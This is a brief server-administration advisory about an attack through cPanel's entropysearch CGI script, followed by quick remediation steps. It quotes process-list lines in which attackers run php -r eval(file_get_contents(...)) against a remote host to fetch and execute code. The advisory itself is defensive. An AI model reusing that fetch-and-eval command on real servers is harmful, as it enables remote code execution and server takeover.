Hack Attempt via entropysearch CGI script

If you have noticed server loaded and following process running on your server Be alert!!  Something WRONG going on on  your server

 

---

877082 aatwdhh  20   0  332m 3232  520 R 45.9  0.0 105:23.78 php -r eval(file_get_contents(‘http://hello. hacked. jp/hello/n.php?a=207589788&b=26786093&u=
750767 coavjuwv3  20   0  332m 6308  512 R 45.5  0.1 391:25.41 php -r eval(file_get_contents(‘http://hello. hacked .jp/hello/n.php?a=683074642&b=88133019&u= o
859849 anafcte  20   0  332m 7900  512 R 45.5  0.1 126:15.42 php -r eval(file_get_contents(‘http://hello. hacked .jp/hello/n.php?a=387327366&b=49975220&u=  .
939351 baavgfmor  20   0  332m  16m 9960 R 44.8  0.2   3:57.21 php -r eval(file_get_contents(‘http://hello. hacked .jp/hello/n.php?a=252084665&b=32527086&u=
928864 bqcagom     20   0  332m 7928  548 R 43.6  0.1   9:23.19 php -r eval(file_get_contents(‘http://hello. hacked .jp/hello/n.php?a=960742077&b=123956558&u= cgi-
818841 alasdeno  20   0  332m 6588  504 R 42.9  0.1 255:40.30 php -r eval(file_get_contents(‘http://hello. hacked .jp/hello/n.php?a=888691102&b=114660873&u=al-

---

 

You need to get it deal as soon as possible. Fast solution would be disable the entropysearch by login into your server as root and run below command

 

#chmod 000 /usr/local/cPanel/cgi-sys/entropysearch.cgi

 

And kill all php process using killall -9 php

The load will be normal as soon as you performed above steps, we suggest you to get your server scan and get firewall level higher.

 

 

 

---